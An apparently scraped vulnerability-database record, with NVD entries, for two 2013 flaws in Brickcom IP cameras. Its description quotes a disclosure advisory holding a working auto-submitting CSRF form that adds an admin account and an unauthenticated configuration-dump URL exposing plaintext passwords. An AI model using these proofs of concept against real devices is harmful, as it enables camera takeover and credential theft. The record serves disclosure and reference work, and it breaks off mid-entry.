      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201310-0208",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "100ap device",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "brickom",
        "version": "3.1.0.8"
      },
      {
        "model": "osd-040e",
        "scope": null,
        "trust": 1.4,
        "vendor": "brickcom",
        "version": null
      },
      {
        "model": "ob-100ae",
        "scope": null,
        "trust": 1.4,
        "vendor": "brickcom",
        "version": null
      },
      {
        "model": "wfb-100ap",
        "scope": null,
        "trust": 1.4,
        "vendor": "brickcom",
        "version": null
      },
      {
        "model": "md-100ap",
        "scope": null,
        "trust": 1.4,
        "vendor": "brickcom",
        "version": null
      },
      {
        "model": "wcb-100ap",
        "scope": null,
        "trust": 1.4,
        "vendor": "brickcom",
        "version": null
      },
      {
        "model": "fb-100ap",
        "scope": null,
        "trust": 1.4,
        "vendor": "brickcom",
        "version": null
      },
      {
        "model": "wcb-100ap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "brickom",
        "version": null
      },
      {
        "model": "md-100ap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "brickom",
        "version": null
      },
      {
        "model": "fb-100ap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "brickom",
        "version": null
      },
      {
        "model": "osd-040e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "brickom",
        "version": null
      },
      {
        "model": "ob-100ae",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "brickom",
        "version": null
      },
      {
        "model": "wfb-100ap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "brickom",
        "version": null
      },
      {
        "model": "100-ap series",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "brickcom",
        "version": "3.1.0.8"
      },
      {
        "model": "brickcom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "brickom",
        "version": "3.0.6.7"
      },
      {
        "model": "brickcom 3.0.6.16c1",
        "scope": null,
        "trust": 0.3,
        "vendor": "brickom",
        "version": null
      },
      {
        "model": "brickcom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "brickom",
        "version": "3.0.6.12"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-07707"
      },
      {
        "db": "BID",
        "id": "60526"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004457"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201306-252"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-3690"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:brickom:100ap_device_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:brickom:fb-100ap",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:brickom:md-100ap",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:brickom:ob-100ae",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:brickom:osd-040e",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:brickom:wcb-100ap",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:brickom:wfb-100ap",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004457"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "JonAis Ropero Castillo.",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201306-252"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2013-3690",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CVE-2013-3690",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 3.5,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 6.8,
            "id": "CNVD-2013-07707",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "LOW",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "VHN-63692",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2013-3690",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2013-3690",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2013-07707",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201306-252",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-63692",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-07707"
      },
      {
        "db": "VULHUB",
        "id": "VHN-63692"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004457"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201306-252"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-3690"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cross-site request forgery (CSRF) vulnerability in cgi-bin/users.cgi in Brickcom FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E, and possibly other camera models with firmware 3.1.0.8 and earlier, allows remote attackers to hijack the authentication of administrators for requests that add users. Brickcom IP Cameras are IP camera devices. A cross-site request forgery vulnerability exists in the Brickcom IP Cameras WEB interface. Allows an attacker to build a malicious URI, entice a user to resolve, and can be used to boost user permissions. \nExploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. \nBrickcom cameras running firmware 3.0.6.7, 3.0.6.12, and 3.0.6.16C1 are vulnerable; other versions may also be affected. Brickcom FB-100Ap and so on are network camera products of Brickcom. The following models are affected: FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E. ============================================================================\nBRICKCOM\n====================================================================\n============================================================================\n\n1.Advisory Information\nTitle: Brickcom 100ap Series Vulnerabilities\nDate Published: 12/06/2013\nDate of last updated: 12/06/2013\n\n2.Vulnerability Description\nMultiples vulnerabilities have been found in this device. \n-CVE-2013-3689. Authentication Bypass Issues(CWE-592) and Clear Text Storage of Sensitive Information(CWE-312)\n-CVE-2013-3690. Cross Site Request Forgery(CWE-352),  Permissions, Privileges, and Access Control(CWE-264) and Execution with Unnecessary Privileges(CWE-250)\n\n3.Affected Products\nThe following products are affected by these vulnerabilities:\nFB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E\nIt\\x92s possible others models are affected but they were not checked. \n-CVE-2013-3689. \nWe have detected the following vulnerable firmwares: firmwareVersion=v3.0.6.7, v3.0.6.12, v3.0.6.16C1\nIn the next firmwares, you need to be log-in as administrator to download this file, but the information is in plain text yet: firmwareVersion=v3.1.0.8,v3.1.0.4\n-CVE-2013-3690. \nAll firmware checked. \n\n4.PoC\n4.1.Authentication Bypass \u0026 Clear Text Storage of Sensitive Information\nCVE-2013-3689, These allows you to download the all the configuration device file writing the next URL (all data shown will be in plain text). It\\x92s not necessary any authentication. \n_____________________________________________________________________________\nhttp://xx.xx.xx.xx/configfile.dump?action=get\n_____________________________________________________________________________\n\nThe most interesting parameters could be:\nUserSetSetting.userList.users[n\\xba].password= ***\nUserSetSetting.userList.users[n\\xba].name= ***\n\n4.2.Cross Site Request Forgerty (CSRF) + Privilege Escalation\nCVE-2013-3690, CSRF is possible via POST method. \nAlso is possible a privilege escalation from a viewer user to an administrator user. \nA malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. \nThe following request can exploit this vulnerability\n_____________________________________________________________________________\n\u003chtml\u003e\n\u003cbody\u003e\n  \u003cform name=\"gobap\" action=\"http://xx.xx.xx.xx/cgi-bin/users.cgi\" method=\"POST\"\u003e\n    \u003cinput type=\"hidden\" name=\"action\" value=\"add\"\u003e\n    \u003cinput type=\"hidden\" name=\"index\" value=\"0\"\u003e\n    \u003cinput type=\"hidden\" name=\"username\" value=\"test2\"\u003e\n    \u003cinput type=\"hidden\" name=\"password\" value=\"test2\"\u003e\n    \u003cinput type=\"hidden\" name=\"privilege\" value=\"1\"\u003e\n    \u003cscript\u003edocument.gobap.submit();\u003c/script\u003e\n \u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n_____________________________________________________________________________\n\n5.Credits\n-CVE-2013-3689 was discovered by Eliezer Varad\\xe9 Lopez, Javier Repiso S\\xe1nchez and Jon\\xe1s Ropero Castillo. \n-CVE-2013-3690 was discovered by Jon\\xe1s Ropero Castillo. \n\n6.Report Timeline\n-2013-05-31: Students team notifies the Brickcom Customer Support of the vulnerabilities. \n-2013-05-31: Brickcom answers saying this in accordance with some of the vulnerabilities, but there are some that they think is not correct. \n(CVE-2013-3689, Authentication bypass and plain text information: After talk with vendor, it\\x92s looks that after firmware 3.1.x.x, this bug is fixed but still the information is shown in plain text, so they should fix this second one)\n-2013-06-03: Students check and communicate Brickcom the detail products and firmwares affected by vulnerabilities. \n-2013-06-04: The vendor is agree with everything stated and reports that will fix it as soon as possible",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-3690"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004457"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-07707"
      },
      {
        "db": "BID",
        "id": "60526"
      },
      {
        "db": "VULHUB",
        "id": "VHN-63692"
      },
      {
        "db": "PACKETSTORM",
        "id": "122003"
      }
    ],
    "trust": 2.61
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-63692",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-63692"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-3690",
        "trust": 3.5
      },
      {
        "db": "BID",
        "id": "60526",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004457",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201306-252",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-07707",
        "trust": 0.6
      },
      {
        "db": "FULLDISC",
        "id": "20130612 SECURITY ANALYSIS OF IP VIDEO SURVEILLANCE CAMERAS",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "38582",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-63692",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "122003",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-07707"
      },
      {
        "db": "VULHUB",
        "id": "VHN-63692"
      },
      {
        "db": "BID",
        "id": "60526"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004457"
      },
      {
        "db": "PACKETSTORM",
        "id": "122003"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201306-252"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-3690"
      }
    ]
  },
  "id": "VAR-201310-0208",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-07707"
      },
      {
        "db": "VULHUB",
        "id": "VHN-63692"
      }
    ],
    "trust": 1.3666667
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-07707"
      }
    ]
  },
  "last_update_date": "2024-11-23T20:45:54.692000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.brickcom.com/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004457"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-352",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-63692"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004457"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-3690"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.4,
        "url": "http://seclists.org/fulldisclosure/2013/jun/84"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3690"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-3690"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/bid/60526"
      },
      {
        "trust": 0.3,
        "url": "http://www.brickcom.com/index.php"
      },
      {
        "trust": 0.1,
        "url": "http://xx.xx.xx.xx/configfile.dump?action=get"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-3690"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-3689"
      },
      {
        "trust": 0.1,
        "url": "http://xx.xx.xx.xx/cgi-bin/users.cgi\""
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-07707"
      },
      {
        "db": "VULHUB",
        "id": "VHN-63692"
      },
      {
        "db": "BID",
        "id": "60526"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004457"
      },
      {
        "db": "PACKETSTORM",
        "id": "122003"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201306-252"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-3690"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-07707"
      },
      {
        "db": "VULHUB",
        "id": "VHN-63692"
      },
      {
        "db": "BID",
        "id": "60526"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004457"
      },
      {
        "db": "PACKETSTORM",
        "id": "122003"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201306-252"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-3690"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-06-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-07707"
      },
      {
        "date": "2013-10-01T00:00:00",
        "db": "VULHUB",
        "id": "VHN-63692"
      },
      {
        "date": "2013-06-12T00:00:00",
        "db": "BID",
        "id": "60526"
      },
      {
        "date": "2013-10-04T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-004457"
      },
      {
        "date": "2013-06-13T06:08:04",
        "db": "PACKETSTORM",
        "id": "122003"
      },
      {
        "date": "2013-06-20T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201306-252"
      },
      {
        "date": "2013-10-01T19:55:09.397000",
        "db": "NVD",
        "id": "CVE-2013-3690"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-06-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-07707"
      },
      {
        "date": "2013-10-02T00:00:00",
        "db": "VULHUB",
        "id": "VHN-63692"
      },
      {
        "date": "2013-06-12T00:00:00",
        "db": "BID",
        "id": "60526"
      },
      {
        "date": "2013-10-04T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-004457"
      },
      {
        "date": "2013-10-16T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201306-252"
      },
      {
        "date": "2024-11-21T01:54:08.070000",
        "db": "NVD",
        "id": "CVE-2013-3690"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201306-252"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "plural  Brickcom Product cross-site request forgery vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004457"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "cross-site request forgery",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201306-252"
      }
    ],
    "trust": 0.6
  }
}

Vulnerability from fkie_nvd
Published
2013-10-01 19:55
Modified
2024-11-21 01:54
Severity ?
Summary
Cross-site request forgery (CSRF) vulnerability in cgi-bin/users.cgi in Brickcom FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E, and possibly other camera models with firmware 3.1.0.8 and earlier, allows remote attackers to hijack the authentication of administrators for requests that add users.



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:brickom:100ap_device_firmware:3.1.0.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "61DF271C-7A04-49A1-B247-40F252D7C9C2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:brickom:fb-100ap:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "7A458982-22F6-4637-87F3-C4AB9A08CEB9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:brickom:md-100ap:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "5A11EA2A-225D-4A48-B387-D47AE4967AA5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:brickom:ob-100ae:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "EFDD3960-F8A0-493B-8C16-3A3A4192A0E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:brickom:osd-040e:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "F24E61C0-A910-4A0E-9B6C-FFCE6792CF77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:brickom:wcb-100ap:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "C61EFCAD-7876-4CB2-937B-565206C44C25",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:brickom:wfb-100ap:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "5A2DBA19-9BE5-456D-AFF6-81767F7EDD2D",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Cross-site request forgery (CSRF) vulnerability in cgi-bin/users.cgi in Brickcom FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E, and possibly other camera models with firmware 3.1.0.8 and earlier, allows remote attackers to hijack the authentication of administrators for requests that add users."
    },
    {
      "lang": "es",
      "value": "Vulnerabilidad de CSRF en cgi-bin/users.cgi en Brickcom FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E, y posiblemente otros modelos de c\u00e1mara con firmware 3.1.0.8 y anteriores, permite a atacantes remotos secuestrar la autenticaci\u00f3n de administradores para peticiones que incluyan usuarios."
    }
  ],
  "id": "CVE-2013-3690",
  "lastModified": "2024-11-21T01:54:08.070",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.8,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2013-10-01T19:55:09.397",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://seclists.org/fulldisclosure/2013/Jun/84"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://seclists.org/fulldisclosure/2013/Jun/84"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-352"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2013-10-04 23:55
Modified
2024-11-21 01:54
Severity ?
Summary
Brickcom FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E, and possibly other camera models with firmware 3.0.6.16C1 and earlier, do not properly restrict access to configfile.dump, which allow remote attackers to obtain sensitive information (user names, passwords, and configurations) via a get action.



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:brickom:100ap_device_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "7B920D75-98F5-4EE3-A867-BEA9699127D7",
              "versionEndIncluding": "3.0.6.16c1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:brickom:fb-100ap:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "7A458982-22F6-4637-87F3-C4AB9A08CEB9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:brickom:md-100ap:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "5A11EA2A-225D-4A48-B387-D47AE4967AA5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:brickom:ob-100ae:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "EFDD3960-F8A0-493B-8C16-3A3A4192A0E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:brickom:osd-040e:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "F24E61C0-A910-4A0E-9B6C-FFCE6792CF77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:brickom:wcb-100ap:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "C61EFCAD-7876-4CB2-937B-565206C44C25",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:brickom:wfb-100ap:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "5A2DBA19-9BE5-456D-AFF6-81767F7EDD2D",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Brickcom FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E, and possibly other camera models with firmware 3.0.6.16C1 and earlier, do not properly restrict access to configfile.dump, which allow remote attackers to obtain sensitive information (user names, passwords, and configurations) via a get action."
    },
    {
      "lang": "es",
      "value": "Brickcom FB-100AP, WCB-100AP, MD-100AP, WFB-100AP,  OB-100Ae, OSD-040E, y posiblemente otros modelos de c\u00e1maras con firmware 3.0.6.16C1 y anteriores, no limitan adecuadamente el acceso a configfile.dump, que permite a atacantes remotos obtener informaci\u00f3n sensible (nombres de usuario, contrase\u00f1as y configuraciones) a trav\u00e9s de una acci\u00f3n get."
    }
  ],
  "id": "CVE-2013-3689",
  "lastModified": "2024-11-21T01:54:07.927",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 7.8,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2013-10-04T23:55:03.970",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://seclists.org/fulldisclosure/2013/Jun/84"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
